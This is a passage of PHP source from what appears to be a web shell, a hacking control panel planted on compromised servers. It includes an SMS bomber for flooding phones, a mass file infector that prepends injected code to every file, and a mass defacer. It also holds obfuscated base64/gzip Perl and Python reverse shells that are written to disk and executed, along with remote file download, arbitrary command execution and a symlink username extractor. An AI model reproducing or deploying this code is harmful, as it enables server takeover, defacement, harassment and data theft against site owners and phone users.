  665.             echo "<tr><td><a class='navbar' href='http://$hossites'>$hossites</a> $site_ips</td><td><a class='navbar' href='http://$hossites3'>$hossites3</a> $site_ips2</td></tr>";
  666.             $num++;
  667.         }
  668.         echo "</table><br>";
  669.         $num = 0;
  670.     } else {
  671.         error("Failed to find or get sites hosted on same server from: <a class='navbar' href='http://www.yougetsignal.com/tools/web-sites-on-web-server/'>www.yougetsignal.com</a>!<br>Additional Message:<br>$message");
  672.     }
  673.     echo "</font><br>";
  674. }
  675. ?>
  676. <?php
  677. //SMS Bomber stuff
  678. if (isset($_POST['do_bomb_sms'])) {
  679.     $phonenum = $_POST['phnumber'];
  680.     $carrier = $_POST['carrier'];
  681.     $amount = $_POST['numberof'];
  682.     $from = $_POST['from'];
  683.     $headers = "From: $from\r\n";
  684.     $headers.= 'MIME-Version: 1.0' . "\n";
  685.     $headers.= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
  686.     $subject = $_POST['subject'];
  687.     $to = "$phonenum$carrier";
  688.     $numsent = 0;
  689.     $sent_fail = 0;
  690.     $sent_success = 0;
  691.     $msgcontent = $_POST['message_content'];
  692.     if (empty($phonenum) OR empty($amount) OR empty($from) OR empty($subject) OR empty($msgcontent)) {
  693.         error("All Fields Must Entered!");
  694.     } else {
  695.         while ($numsent < $amount) {
  696.             if (!@mail($to, $subject, $msgcontent, $headers)) {
  697.                 $numsent++;
  698.                 $sent_fail++;
  699.             } else {
  700.                 $numsent++;
  701.                 $sent_success++;
  702.             }
  703.         }
  704.         echo "<font color='#14ab00'>Successfully sent $sent_success messages.<br>
  705. Failed to send $sent_fail messages.<br>";
  706.     }
  707. }
  708. if (isset($_GET['sms'])) {
  709.     echo "<font color='#14ab00'>
  710. <table class='noborder'>
  711. <tr>
  712. <form action='' method='post'>
  713. <td>Phone Number With Area Code</td>
  714. <td><input type='text' name='phnumber' class='text'></td>
  715. </tr>
  716. <tr>
  717. <td>Carrier:</td>
  718. <td>
  719. <select name='carrier'>
  720. <option value='@sms.3rivers.net'>3 River Wireless</option>
  721. <option value='@paging.acswireless.com'>ACS Wireless</option>
  722. <option value='@advantagepaging.com'>Advantage Communications</option>
  723. <option value='@airtelkk.com'>Airtel (Karnataka, India)</option>
  724. <option value='@sms.airtelmontana.com'>Airtel Wireless (Montana, USA)</option>
  725. <option value='@airtouch.net'>Airtouch Pagers</option>
  726. <option value='@airtouchpaging.com'>Airtouch Pagers</option>
  727. <option value='@alphapage.airtouch.com'>Airtouch Pagers</option>
  728. <option value='@myairmail.com'>Airtouch Pagers</option>
  729. <option value='@msg.acsalaska.com'>Alaska Communications Systems</option>
  730. <option value='@message.alltel.com'>Alltel</option>
  731. <option value='@alphanow.net'>AlphaNow</option>
  732. <option value='@page.americanmessaging.net'>American Messaging</option>
  733. <option value='@clearpath.acswireless.com'>Ameritech Clearpath</option>
  734. <option value='@paging.acswireless.com'>Ameritech Paging</option>
  735. <option value='@pageapi.com'>Ameritech Paging</option>
  736. <option value='@airtelap.com'>Andhra Pradesh Airtel</option>
  737. <option value='@text.aql.com'>Aql</option>
  738. <option value='@archwireless.net'>Arch Pagers (PageNet)</option>
  739. <option value='@epage.arch.com'>Arch Pagers (PageNet)</option>
  740. <option value='@mobile.att.net'>AT&T</option>
  741. <option value='@txt.att.net'>AT&T2</option>
  742. <option value='@page.att.net'>AT&T Enterprise Paging</option>
  743. <option value='@mmode.com'>AT&T Free2Go</option>
  744. <option value='@mobile.att.net'>AT&T PCS</option>
  745. <option value='@dpcs.mobile.att.net'>AT&T Pocketnet PCS</option>
  746. <option value='@sms.beemail.ru'>BeeLine GSM</option>
  747. <option value='@beepwear.net'>Beepwear</option>
  748. <option value='@message.bam.com'>Bell Atlantic</option>
  749. <option value='@bellmobility.ca'>Bell Canada</option>
  750. <option value='@txt.bellmobility.ca'>Bell Canada2</option>
  751. <option value='@txt.bell.ca'>Bell Mobility (Canada)</option>
  752. <option value='@bellsouth.cl'>Bell South</option>
  753. <option value='@blsdcs.net'>Bell South2</option>
  754. <option value='@sms.bellsouth.com'>Bell South3</option>
  755. <option value='@wireless.bellsouth.com'>Bell South4</option>
  756. <option value='@bellsouthtips.com'>Bell South (Blackberry)</option>
  757. <option value='@blsdcs.net'>Bell South Mobility</option>
  758. <option value='@tachyonsms.co.uk'>BigRedGiant Mobile Solutions</option>
  759. <option value='@blueskyfrog.com'>Blue Sky Frog</option>
  760. <option value='@sms.bluecell.com'>Bluegrass Cellular</option>
  761. <option value='@myboostmobile.com'>Boost</option>
  762. <option value='@bplmobile.com'>BPL Mobile</option>
  763. <option value='@@bplmobile.com'>BPL Mobile (Mumbai, India)</option>
  764. <option value='@cmcpaging.com'>Carolina Mobile</option>
  765. <option value='@cwwsms.com'>Carolina West Wireless</option>
  766. <option value='@cell1.textmsg.com'>Cellular One</option>
  767. <option value='@cellularone.textmsg.com'>Cellular One2</option>
  768. <option value='@message.cellone-sf.com'>Cellular One3</option>
  769. <option value='@mobile.celloneusa.com'>Cellular One4</option>
  770. <option value='@sbcemail.com'>Cellular One5</option>
  771. <option value='@phone.cellone.net'>Cellular One (East Coast)</option>
  772. <option value='@swmsg.com'>Cellular One (South West)</option>
  773. <option value='@mycellone.com'>Cellular One (West)</option>
  774. <option value='@paging.cellone-sf.com'>Cellular One PCS</option>
  775. <option value='@csouth1.com'>Cellular South</option>
  776. <option value='@cwemail.com'>Centennial Wireless</option>
  777. <option value='@cvcpaging.com'>Central Vermont</option>
  778. <option value='@messaging.centurytel.net'>CenturyTel</option>
  779. <option value='@rpgmail.net'>Chennai RPG Cellular</option>
  780. <option value='@airtelchennai.com'>Chennai Skycell / Airtel</option>
  781. <option value='@gocbw.com'>Cincinnati Bell</option>
  782. <option value='@cingularme.com'>Cingular</option>
  783. <option value='@mms.cingularme.com'>Cingular2</option>
  784. <option value='@mycingular.com'>Cingular3</option>
  785. <option value='@page.cingular.com'>Cingular5</option>
  786. <option value='@txt.att.net'>Cingular (Now AT&T)</option>
  787. <option value='@clarotorpedo.com.br'>Claro (Brasil)</option>
  788. <option value='@ideasclaro-ca.com'>Claro (Nicaragua)</option>
  789. <option value='@msg.clearnet.com'>Clearnet</option>
  790. <option value='@comcastpcs.textmsg.com'>Comcast</option>
  791. <option value='@comcel.com.co'>Comcel</option>
  792. <option value='@sms.comviq.se'>Comviq</option>
  793. <option value='@cookmail.com'>Cook Paging</option>
  794. <option value='@corrwireless.net'>Corr Wireless Communications</option>
  795. <option value='@sms.mycricket.com'>Cricket</option>
  796. <option value='@sms.ctimovil.com.ar'>CTI</option>
  797. <option value='@airtelmail.com'>Delhi Aritel</option>
  798. <option value='@delhi.hutch.co.in'>Delhi Hutch</option>
  799. <option value='@page.hit.net'>Digi-Page / Page Kansas</option>
  800. <option value='@mobile.dobson.net'>Dobson</option>
  801. <option value='@sms.orange.nl'>Dutchtone / Orange-NL</option>
  802. <option value='@sms.edgewireless.com'>Edge Wireless</option>
  803. <option value='@sms.emt.ee'>EMT</option>
  804. <option value='@emtelworld.net'>Emtel (Mauritius)</option>
  805. <option value='@escotelmobile.com'>Escotel</option>
  806. <option value='@fido.ca'>Fido</option>
  807. <option value='@epage.gabrielwireless.com'>Gabriel Wireless</option>
  808. <option value='@sendabeep.net'>Galaxy Corporation</option>
  809. <option value='@webpager.us'>GCS Paging</option>
  810. <option value='@msg.gci.net'>General Communications Inc.</option>
  811. <option value='@t-mobile-sms.de'>German T-Mobile</option>
  812. <option value='@msg.globalstarusa.com'>Globalstar (satellite)</option>
  813. <option value='@bplmobile.com'>Goa BPLMobil</option>
  814. <option value='@sms.goldentele.com'>Golden Telecom</option>
  815. <option value='@epage.porta-phone.com'>GrayLink / Porta-Phone</option>
  816. <option value='@celforce.com'>Gujarat Celforce</option>
  817. <option value='@messaging.sprintpcs.com'>Helio</option>
  818. <option value='@text.houstoncellular.net'>Houston Cellular</option>
  819. <option value='@ideacellular.net'>Idea Cellular</option>
  820. <option value='@ivctext.com'>Illinois Valley Cellular</option>
  821. <option value='@page.infopagesystems.com'>Infopage Systems</option>
  822. <option value='@inlandlink.com'>Inland Cellular Telephone</option>
  823. <option value='@msg.iridium.com'>Iridium (satellite)</option>
  824. <option value='@rek2.com.mx'>Iusacell</option>
  825. <option value='@jsmtel.com'>JSM Tele-Page</option>
  826. <option value='@msg.koodomobile.com'>Koodo Mobile (Canada)</option>
  827. <option value='@mci.com'>MCI Phone</option>
  828. <option value='@sms.mymeteor.ie'>Meteor</option>
  829. <option value='@metropcs.sms.us'>Metro PCS</option>
  830. <option value='@clearlydigital.com'>Midwest Wireless</option>
  831. <option value='@mobilecomm.net'>Mobilcomm</option>
  832. <option value='@text.mtsmobility.com'>MTS</option>
  833. <option value='@sms.netcom.no'>Netcom</option>
  834. <option value='@messaging.nextel.com'>Nextel</option>
  835. <option value='@o2.co.uk'>O2</option>
  836. <option value='@o2imail.co.uk'>O2#2</option>
  837. <option value='@mmail.co.uk'>O2 (M-mail)</option>
  838. <option value='@orange.net'>Orange</option>
  839. <option value='@qwestmp.com'>Qwest</option>
  840. <option value='@pcs.rogers.com'>Rogers</option>
  841. <option value='@sms.sasktel.com'>Sasktel (Canada)</option>
  842. <option value='@mysmart.mymobile.ph'>Smart Telecom</option>
  843. <option value='@messaging.sprintpcs.com'>Sprint</option>
  844. <option value='@tms.suncom.com'>Sumcom</option>
  845. <option value='@tmomail.net'>T-Mobile</option>
  846. <option value='@t-mobile.uk.net'>T-Mobile (UK)</option>
  847. <option value='@t-d1-sms.de'>T-Mobile Germany</option>
  848. <option value='@txt.att.net'>Tracfone</option>
  849. <option value='@mmst5.tracfone.com'>Tracfone (prepaid)</option>
  850. <option value='@vtext.com'>Verizon</option>
  851. <option value='@vmobl.com'>Virgin Mobile</option>
  852. <option value='@vmobile.ca'>Virgin Mobile (Canada)</option>
  853. <option value='@vodafone.net'>Vodafone UK</option>
  854. </select>
  855. </td>
  856. </tr>
  857. <tr>
  858. <td>Amount Of Messages To Send:</td>
  859. <td><input type='text' name='numberof' size='10' class='text'></td>
  860. </tr>
  861. <tr>
  862. <td>From:</td>
  863. <td><input type='text' name='from' class='text'></td>
  864. </tr>
  865. <tr>
  866. <td>Subject:</td>
  867. <td><input type='text' size='85' class='text' name='subject'></td>
  868. </tr>
  869. </table>
  870. Message Content:<br>
  871. <textarea rows='20' cols='150' name='message_content' style='color:#00ff00'>
  872. </textarea><br>
  873. <input type='submit' name='do_bomb_sms' value='Bomb'><br>
  874. </form><br></font><br>";
  875. }
  876. ?>
  877. <?php
  878. //Install MySQL Tool
  879. if (isset($_GET['installMySQL'])) {
  880.     echo "<center>
  881. <font size='4'>
  882. <a href='?msd1' class='navbar'>Install MySQL Dumper v2.0 By: Plum</a>
  883. <br>
  884. <br>
  885. <a href='?msd2' class='navbar'>Install MySQL Dumper v1.24.4 (Original MSD)</a>
  886. </font>
  887. </center>
  888. <br>";
  889. }
  890. //MSD 1 stuff
  891. if (isset($_GET['msd1'])) {
  892.     echo "<center>
  893. <font color='#14ab00' size='3'>
  894. Directory to install to:<br>
  895. If directory does not exist it will attempt to create it.
  896. <form action='' method='post'>
  897. <input type='text' name='msd1dir' class='text' size='50' value='$dir/msd'>
  898. <input type='submit' name='installmsd1' value='Install'>
  899. <form>
  900. </font>
  901. </center>
  902. <br>";
  903. }
  904. if (isset($_POST['installmsd1'])) {
  905.     $msd1dir = rtrim($_POST['msd1dir'], "/");
  906.     $msd1dir2 = "$msd1dir/msdv2.zip";
  907.     if (!is_dir($msd1dir)) {
  908.         if (!mkdir($msd1dir, 0777)) {
  909.             error("Failed to make directory $msd1dir");
  910.         }
  911.     }
  912.     $link = file_get_contents("http://p0wersurge.com/msdv2.zip");
  913.     if (file_put_contents($msd1dir2, $link)) {
  914.         unzip($msd1dir2, $msd1dir);
  915.     } else {
  916.         error("Could not write to $msd1dir");
  917.     }
  918. }
  919. //MSD 2 stuff
  920. if (isset($_GET['msd2'])) {
  921.     echo "<center>
  922. <font color='#14ab00' size='3'>
  923. Directory to install to:<br>
  924. If directory does not exist it will attempt to create it.
  925. <form action='' method='post'>
  926. <input type='text' name='msd2dir' class='text' size='50' value='$dir/msd'>
  927. <input type='submit' name='installmsd2' value='Install'>
  928. <form>
  929. </font>
  930. </center>
  931. <br>";
  932. }
  933. if (isset($_POST['installmsd2'])) {
  934.     $msd2dir = rtrim($_POST['msd2dir'], "/");
  935.     $msd2dir2 = "$msd2dir/msd.zip";
  936.     if (!is_dir($msd2dir)) {
  937.         if (!mkdir($msd2dir, 0777)) {
  938.             error("Failed to make directory $msd2dir");
  939.         }
  940.     }
  941.     $link = file_get_contents("http://p0wersurge.com/msd.zip");
  942.     if (file_put_contents($msd2dir2, $link)) {
  943.         unzip($msd2dir2, $msd2dir);
  944.     } else {
  945.         error("Could not write to $msd2dir");
  946.     }
  947. }
  948. ?>
  949. <?php
  950. //Mass file infect
  951. if (isset($_POST['do_mass_infect'])) {
  952.     $masscode = " " . $_POST['massinfect_code'] . "\n";
  953.     $inf_dir = $_POST['infect_dir'];
  954.     $infcustom_dir = $_POST['cinfect_dir'];
  955.     $infcustom_dir = rtrim($infcustom_dir, "/");
  956.     $failed = 0;
  957.     $success = 0;
  958.     if (empty($masscode)) {
  959.         error("You must enter a code to infect files with!");
  960.     } elseif (empty($infcustom_dir) && $inf_dir == "custom") {
  961.         error("You must enter a custom directory when using the Custom option!");
  962.     } else {
  963.         if ($inf_dir == "root") {
  964.             $mddir = $rootdir;
  965.         }
  966.         if ($inf_dir == "custom") {
  967.             $mddir = $infcustom_dir;
  968.         }
  969.         foreach (files($mddir) as $key => $file) {
  970.             $file2 = trim($file, ".");
  971.             $getinf_file = file_get_contents($file2);
  972.             if ("$file2" == "$dir/$script2") {
  973.                 echo "";
  974.             } else {
  975.                 if (file_put_contents("$file2", $masscode) && file_put_contents("$file2", $getinf_file, FILE_APPEND)) {
  976.                     echo "<font color='green'><b>Successfully infected file: $file2</b></font><br>";
  977.                     $success++;
  978.                 } else {
  979.                     echo "<font color='red'><b>Failed to infect file: $file2</b></font><br>";
  980.                     $failed++;
  981.                 }
  982.             }
  983.         }
  984.         echo "<font color='#14ab00'><b>$success files successfully infected! ^_^<br>Failed to infect $failed files! :( </b></font><br>";
  985.     }
  986. }
  987. if (isset($_GET['massinfect'])) {
  988.     $example = "<?php system() ?>";
  989.     $example = htmlspecialchars($example);
  990.     $example2 = "<script>alert()</script>";
  991.     $example2 = htmlspecialchars($example2);
  992.     echo "<center>
  993. <font color='#14ab00'>
  994. <form action='' method='post'>
  995. Directory to start infect from:<br>
  996. <select name='infect_dir'>
  997. <option value='root'>Root</option>
  998. <option value='custom'>Custom</option>
  999. </select><br>
  1000. Custom Directory: <input class='text' type='text' name='cinfect_dir' size='40'><br>
  1001. This is great for infecting mass files with javascript scripts or php scripts<br>
  1002. It will append the code to the top of each file.<br>
  1003. Example:<br>
  1004. $example<br>
  1005. $example2<br>
  1006. Infect code:<br>
  1007. <textarea rows='20' cols='150' name='massinfect_code' style='color:#000'>
  1008. </textarea><br>
  1009. This will not infect this shell.<br>
  1010. <input type='submit' name='do_mass_infect' value='Infect'><br>
  1011. </form>
  1012. </font>
  1013. </center>";
  1014. }
  1015. ?>
  1016. <?php
  1017. //Mass Defacer
  1018. if (isset($_POST['do_mass_deface'])) {
  1019.     if (get_magic_quotes_gpc()) {
  1020.         $mass_source = stripslashes($_POST['massdeface_source']);
  1021.     } else {
  1022.         $mass_source = $_POST['massdeface_source'];
  1023.     }
  1024.     $def_dir = $_POST['deface_dir'];
  1025.     $custom_dir = $_POST['custom_dir'];
  1026.     $custom_dir = rtrim($custom_dir, "/");
  1027.     $failed = 0;
  1028.     $success = 0;
  1029.     if (empty($mass_source)) {
  1030.         error("You must enter a source!");
  1031.     } elseif (empty($custom_dir) && $def_dir == "custom") {
  1032.         error("You must enter a custom directory when using the Custom option!");
  1033.     } else {
  1034.         if ($def_dir == "root") {
  1035.             $mddir = $rootdir;
  1036.         }
  1037.         if ($def_dir == "custom") {
  1038.             $mddir = $custom_dir;
  1039.         }
  1040.         foreach (files($mddir) as $key => $file) {
  1041.             $file2 = trim($file, ".");
  1042.             if ("$file2" == "$dir/$script2") {
  1043.                 echo "";
  1044.             } else {
  1045.                 if (file_put_contents("$file2", $mass_source)) {
  1046.                     echo "<font color='green'><b>Successfully defaced file: $file2</b></font><br>";
  1047.                     $success++;
  1048.                 } else {
  1049.                     echo "<font color='red'><b>Failed to deface file: $file2</b></font><br>";
  1050.                     $failed++;
  1051.                 }
  1052.             }
  1053.         }
  1054.         echo "<font color='#14ab00'><b>$success files successfully defaced!<br>Failed to deface $failed files!</b></font><br>";
  1055.     }
  1056. }
  1057. if (isset($_GET['massdeface'])) {
  1058.     echo "<center>
  1059. <font color='#14ab00'>
  1060. <form action='' method='post'>
  1061. Directory to start deface from:<br>
  1062. <select name='deface_dir'>
  1063. <option value='root'>Root</option>
  1064. <option value='custom'>Custom</option>
  1065. </select><br>
  1066. Custom Directory: <input class='text' type='text' name='custom_dir' size=security'40'><br>
  1067. Source of deface:<br>
  1068. <textarea rows='20' cols='150' name='massdeface_source' style='color:#7FFF00'>
  1069. </textarea><br>
  1070. This will not deface this shell.<br>
  1071. <input type='submit' name='do_mass_deface' value='Deface'><br>
  1072. </form>
  1073. </font>
  1074. </center>";
  1075. }
  1076. ?>
  1077. <?php
  1078. if(isset($_GET['perlbackconnect']))
  1079. { ?>
  1080. <font size=2 face="comic sans ms" color=white>
  1081. <p><form method=POST action="">
  1082. Client ip:<input type=text name=ip value=<?php echo $_SERVER['REMOTE_ADDR'];?>>
  1083. Connection Port:<input type=text name=port /><p>
  1084. <input type=submit name=sbm value="Connect" /></form>
  1085. </font>
  1086. <?php
  1087.  
  1088.  
  1089. if(isset($_POST['sbm']))
  1090. {
  1091.     $r=$_POST["ip"];
  1092.     $s=$_POST["port"];
  1093.     $p1 ='hVNhb5swEP0eKf/hSqsFpNCE9sOkRFTLUtKibU0FJJrEUGTgWlCJHWGzJZr234dNqBKlVY0E9rtnv3e+4/xsUPFyEOd0sMGy6Ha6nYojuPPRyGfJC4qxhC74jgtcgw09RY0Jz3pNZOLdTe0v9Xup1psypwI0ME3bDsOvJHmZMkoxEeBnWBRRZNumCb/onhCzLbA/FFOIdxAgWYNL05wfUWsyaOrw/Al0JXhmXxnwV0KwF1xw8owjuBhCeM+4iCB8ZGX9kdubzZDmCJqzVSTr6vPlsH4ssK6ta2g5/9r8D3KXy1le4D2haYEK4iqq+/PpNyfow+Ns5T7IiQRWfuA5kx99eEaxKZlg8Y6SNeo9kWx6hgGsVEb2tkMzggUlcYEgGHjIWfEbQWbQWkqa63sVk9okTctVTtVdLEMr6kNOUayIYC02jIwPtNqyHGo1VZazRs28IZVgT0XFM91QDLZBqvvBrfvQB+3mU0PTjmPzRdB/L+Z43kms9Sfr/Nb4qJUOvetaRTnWWbl+MHO/O2No1v5k6UgMxphkrAbrkoBJYPw6VQF10t5W28nv+ak7d37Suf5J5761N61SvFSjQMEhwy2ILOfAs1zAz1s4POAou/1/2Bg8d+azbuc/';
  1094.    
  1095.    $dec= gzinflate(base64_decode($p1));
  1096.    $fname = fopen('backconn.pl','w');
  1097.      fwrite($fname,$dec);
  1098.       $d="backconn.pl";
  1099.      $ch="chmod +x ".$d ;
  1100.             $permission= system($ch);
  1101.            
  1102.             $z="perl ".$d." ".$r." ".$s;
  1103.             $run= system($z);
  1104.    
  1105.  }  
  1106.  
  1107. }
  1108. ?>
  1109. <?php
  1110. if(isset($_GET['pythonbackconnect']))
  1111. {
  1112.     ?>
  1113. <form method=POST>
  1114. Client ip:<input type=text name=pyt value=<?php echo $_SERVER['REMOTE_ADDR'];?>>
  1115. port:<input type=text name=port /><p>
  1116. <input type=submit name=pyb value="Connect" /></form>
  1117. </font>
  1118. <?php
  1119. }
  1120. ?>
  1121. <?php
  1122. if(isset($_POST['pyb']))
  1123. {
  1124.     $r=$_POST["pyt"];
  1125.     $s=$_POST["port"];
  1126.     $py = 'fVLfS8MwEH4X/B9u9WEptJ1O8UEouI0JIjpwe+vK6I/bGpYmJUnV+tebrF2dIEsgucv33eXj7q4Go1rJUUr5qGp0IfjlRbtpWQmpQTXKAyWyPWoPhLXrtJIiQ6WOzEIoDaFlBoncfUQ3sX09RIdAuSY9Mo7dY1CbMlCoc9wmNdOalihqTe6ve45BIM2I+2AdAC2bzgKjaG+/7JIcLtJ5k6fN89t85XXucjF72SxX7/PJq3sSHWSCc8w0IVa+Z9W6f3CFPCfD4fD41q4cP5CJCiWILeiCKlCZpJUGY6V3TCffiXzclQll5oMS1vxv+Ony/TCMoqn4gsUnxxymDawwKeGZ53RZIGNxHIa+b3KsudHRixMqyOtqTKzILWXIBXG96/PwzXl4fB6+/S2M1WUL3w9BkCWMkcg5TJAqHM/xqRN3AfiVoalN14muw30PK2mGA5xoEMOsbQYVHCwrB8Nz/suBUgrpAf6XZG4x+CyMbOi6S/nOMeyWbE87Tj8=';
  1127.    
  1128.    $dec= gzinflate(base64_decode($py));
  1129.    $fname = fopen('backconn.py','w');
  1130.      fwrite($fname,$dec);
  1131.       $d="backconn.py";
  1132.      $ch="chmod +x ".$d ;
  1133.             $permission= system($ch);
  1134.            
  1135.             $z="python ".$d." ".$r." ".$s;
  1136.             $run= system($z);
  1137.    
  1138.  }    
  1139. ?>
  1140. <?php
  1141. //echo out files
  1142. echo "<table border='1' width='100%' frame='void'>
  1143. <tr>
  1144. <th>
  1145. Current Directory: ";
  1146. $ex = explode("/", $dir);
  1147. for ($p = 0;$p < count($ex);$p++) {
  1148.     @$linkpath.= $ex[$p] . '/';
  1149.     $linkpath2 = rtrim($linkpath, "/");
  1150.     echo "<a href=http://$domain$script?path=$linkpath2>$ex[$p]</a>/";
  1151. }
  1152. echo "</th>
  1153. </tr>
  1154. </table>
  1155. <div id='hover'>
  1156. <table border='1' width='100%'>
  1157. <form action='' method='post' id='checkboxall'>
  1158. <tr>
  1159. <th>Directory/File Name</th>
  1160. <th>Owner/Group</th>
  1161. <th>Permissions</th>
  1162. <th>Writeable</th>
  1163. <th>Size</th>
  1164. <th>Last Modified</th>
  1165. <th>Delete</th>
  1166. <th>Rename</th>
  1167. <th>Mass</th>
  1168. </tr>
  1169. ";
  1170. foreach ($direcs as $d) {
  1171.     $downer = function_exists("posix_getpwuid") ? posix_getpwuid(fileowner("$dir/$d")) : fileowner("$dir/$d");
  1172.     $dgroup = function_exists("posix_getgrgid") ? posix_getgrgid(filegroup("$dir/$d")) : filegroup("$dir/$d");
  1173.     if (is_array($downer)) {
  1174.         $downer = $downer['name'];
  1175.     }
  1176.     if (is_array($dgroup)) {
  1177.         $dgroup = $dgroup['name'];
  1178.     }
  1179.     $dperms = substr(base_convert(fileperms("$dir/$d"), 10, 8), 2);
  1180.     $dwrite = is_writeable("$dir/$d") ? "<font color='#00ff00'><b>Writeable</b></font>" : "<font color='red'><b>Non Writeable</b></font>";
  1181.     $dsize = "Directory";
  1182.     $dtime = date("F d Y g:i:s", filemtime("$dir/$d"));
  1183.     echo "<tr>
  1184. <td><a href='http://$domain$script?path=$dir/$d'>$d</a></td>
  1185. <td style='text-align: center;'>$downer/$dgroup</td>
  1186. <td style='text-align: center;'>$dperms</td>
  1187. <td style='text-align: center;'>$dwrite</td>
  1188. <td style='text-align: center;'>$dsize</td>
  1189. <td style='text-align: center;'>$dtime</td>
  1190. <td style='text-align: center;'><a href='http://$domain$script?deldir=$dir/$d'>Delete</a></td>
  1191. <td style='text-align: center;'><a href='http://$domain$script?rendir=$dir&old=$d'>Rename</a></td>
  1192. <td style='text-align: center;'><input name='delbox[]' type='checkbox' id='delbox' value='$dir/$d'></td>
  1193. </tr>";
  1194. }
  1195. foreach ($files as $f) {
  1196.     $fowner = function_exists("posix_getpwuid") ? posix_getpwuid(fileowner("$dir/$f")) : fileowner("$dir/$f");
  1197.     $fgroup = function_exists("posix_getgrgid") ? posix_getgrgid(filegroup("$dir/$f")) : filegroup("$dir/$f");
  1198.     if (is_array($fowner)) {
  1199.         $fowner = $fowner['name'];
  1200.     }
  1201.     if (is_array($fgroup)) {
  1202.         $fgroup = $fgroup['name'];
  1203.     }
  1204.     $fperms = substr(base_convert(fileperms("$dir/$f"), 10, 8), 2);
  1205.     $fwrite = is_writeable("$dir/$f") ? "<font color='#00ff00'><b>Writeable</b></font>" : "<font color='red'><b>Non Writeable</b></font>";
  1206.     $fsize = ByteConversion(filesize("$dir/$f"));
  1207.     $ftime = date("F d Y g:i:s", filemtime("$dir/$f"));
  1208.     $zip_file = explode(".", $f);
  1209.     $zip_file2 = end($zip_file);
  1210.     echo "<tr>";
  1211.     if ($zip_file2 == "zip") {
  1212.         echo "<td><a href='http://$domain$script?unzipfile=$dir/$f'>$f</td>";
  1213.     } else {
  1214.         echo "<td><a href='http://$domain$script?editfile=$dir/$f'>$f</td>";
  1215.     }
  1216.     echo "<td style='text-align: center;'>$fowner/$fgroup</td>
  1217. <td style='text-align: center;'>$fperms</td>
  1218. <td style='text-align: center;'>$fwrite</td>
  1219. <td style='text-align: center;'>$fsize</td>
  1220. <td style='text-align: center;'>$ftime</td>
  1221. <td style='text-align: center;'><a href='http://$domain$script?delfile=$dir/$f'>Delete</a></td>
  1222. <td style='text-align: center;'><a href='http://$domain$script?renfile=$dir&old=$f'>Rename</a></td>
  1223. <td style='text-align: center;'><input name='delbox[]' type='checkbox' id='delbox' value='$dir/$f'></td>
  1224. </tr>";
  1225. }
  1226. echo "</table></div>";
  1227. echo "<div id='bottom'><font color='#14ab00'>With all selected:</font><br>
  1228. <input type='button' onclick='checkall();' value='Select/Unselect All'>
  1229. <select name='mass_action'>
  1230. <option value='Delete'>Delete</option>
  1231. <option value='chmod'>chmod</option>
  1232. </select>
  1233. <input type='text' name='chmod_value' class='text' value='chmod value' size='9' id='ch' onfocus='removeValue()'>
  1234. <input type='submit' name='mass_files'><br></div>";
  1235. echo "</form>";
  1236. closedir();
  1237. ?>
  1238. <script type="text/javascript">/*<![CDATA[*/function removeValue(){document.getElementById("ch").value=""}checked=false;function checkall(a){var c=document.getElementById("checkboxall");if(checked==false){checked=true}else{checked=false}for(var b=0;b<c.elements.length;b++){c.elements[b].checked=checked}};/*]]>*/</script>
  1239. <?php
  1240. $wr = is_writeable($dir) ? "<font color='#00ff00'><b>[ Writeable ]</b></font>" : "<font color='red'><b>[ Non Writeable ]</b></font>";
  1241. echo "<table border='1' width='100%' frame='void'>
  1242. <tr>
  1243. <td>
  1244. <center>
  1245. Create directory:<br>
  1246. <form action='' method='post'>
  1247. <input type='text' class='textround' name='create_dir' value='$dir/newdir' size='50'>
  1248. <input type='submit' name='do_create_dir' value='Create'><br>
  1249. $wr
  1250. </form>
  1251. </center>
  1252. </td>
  1253. <td>
  1254. <center>
  1255. Create file:<br>
  1256. <form action='' method='post'>
  1257. <input type='text' class='textround' name='create_file' value='$dir/newfile.php' size='50'>
  1258. <input type='submit' name='do_create_file' value='Create'><br>
  1259. $wr
  1260. </form>
  1261. </center>
  1262. </td>
  1263. </tr>
  1264. <tr>
  1265. <td>
  1266. <center>
  1267. Go to directory:<br>
  1268. <form action='' method='post'>
  1269. <input type='text'class='textround' name='go_dir' value='/tmp' size='50'>
  1270. <input type='submit' name='do_go_dir' value='Go'><br>
  1271. </form>
  1272. </center>
  1273. </td>
  1274. <td>
  1275. <center>
  1276. Edit file:<br>
  1277. <form action='' method='post'>
  1278. <input type='text' class='textround' name='go_edit_file' value='$dir/index.php' size='50'>
  1279. <input type='submit' name='do_go_edit' value='Edit'><br>
  1280. </form>
  1281. </center>
  1282. </td>
  1283. </tr>
  1284. <tr>
  1285. <td>
  1286. <center>
  1287. <form action='' method='post' enctype='multipart/form-data'>
  1288. Upload to location:<br>
  1289. <input type='text' class='text' style='width: 300px' value='$dir/' name='upload_location'></br><input type='file' name='upload_file'>
  1290. <input type='submit' value='Upload' name='do_upload_file'><br>
  1291. $wr
  1292. </form>
  1293. </center>
  1294. </td>
  1295. <td>
  1296. <center>
  1297. <form action='' method='post'>
  1298. wget file:<br>
  1299. <input type='text' name='wget_file' class='text' size='50' value='http://'>
  1300. <input type='submit' name='do_wget_file' value='wget'>
  1301. </form>
  1302. </center>
  1303. </td>
  1304. </tr>
  1305. <table border='1' frame='void' width='100%'>
  1306. <tr>
  1307. <td>
  1308. <center>
  1309. <form action='' method='post'>
  1310. Execute Command:<br>
  1311. <input type='text' class='text' name='exe_command' size='60'>
  1312. <input type='submit' name='do_exe_command' value='Execute'><br>
  1313. </form>
  1314. </center>
  1315. </td>
  1316. </tr>
  1317. </table>
  1318. <br><br><br>";
  1319. ?>
  1320. <?php
  1321. //Salt generator
  1322. function gen_salt($length) {
  1323.     $characters = array("a", "A", "b", "B", "c", "C", "d", "D", "e", "E", "f", "F", "g", "G", "h", "H", "i", "I", "j", "J", "k", "K", "l", "L", "m", "M", "n", "N", "o", "O", "p", "P", "q", "Q", "r", "R", "s", "S", "t", "T", "u", "U", "v", "V", "w", "W", "x", "X", "y", "Y", "z", "Z", "1", "2", "3", "4", "5", "6", "7", "8", "9");
  1324.     $i = 0;
  1325.     $salt = "";
  1326.     while ($i < $length) {
  1327.         $arrand = array_rand($characters, 1);
  1328.         $salt.= $characters[$arrand];
  1329.         $i++;
  1330.     }
  1331.     return $salt;
  1332. }
  1333. ?>
  1334. <h2><p>Symlink Killer ++</p></h2>
  1335. <form method=post><font color=white size=2 face="comic sans ms">Click this button to generate PHP.ini</font><p>
  1336. <input type=submit name=ini value="Generate PHP.ini" /></form>
  1337. <form method=post><font color=white size=2 face="comic sans ms">Click this button to extract usernames for Symlink</font><p>
  1338. <input type=submit name="usre" value="Extract usernames" /></form>
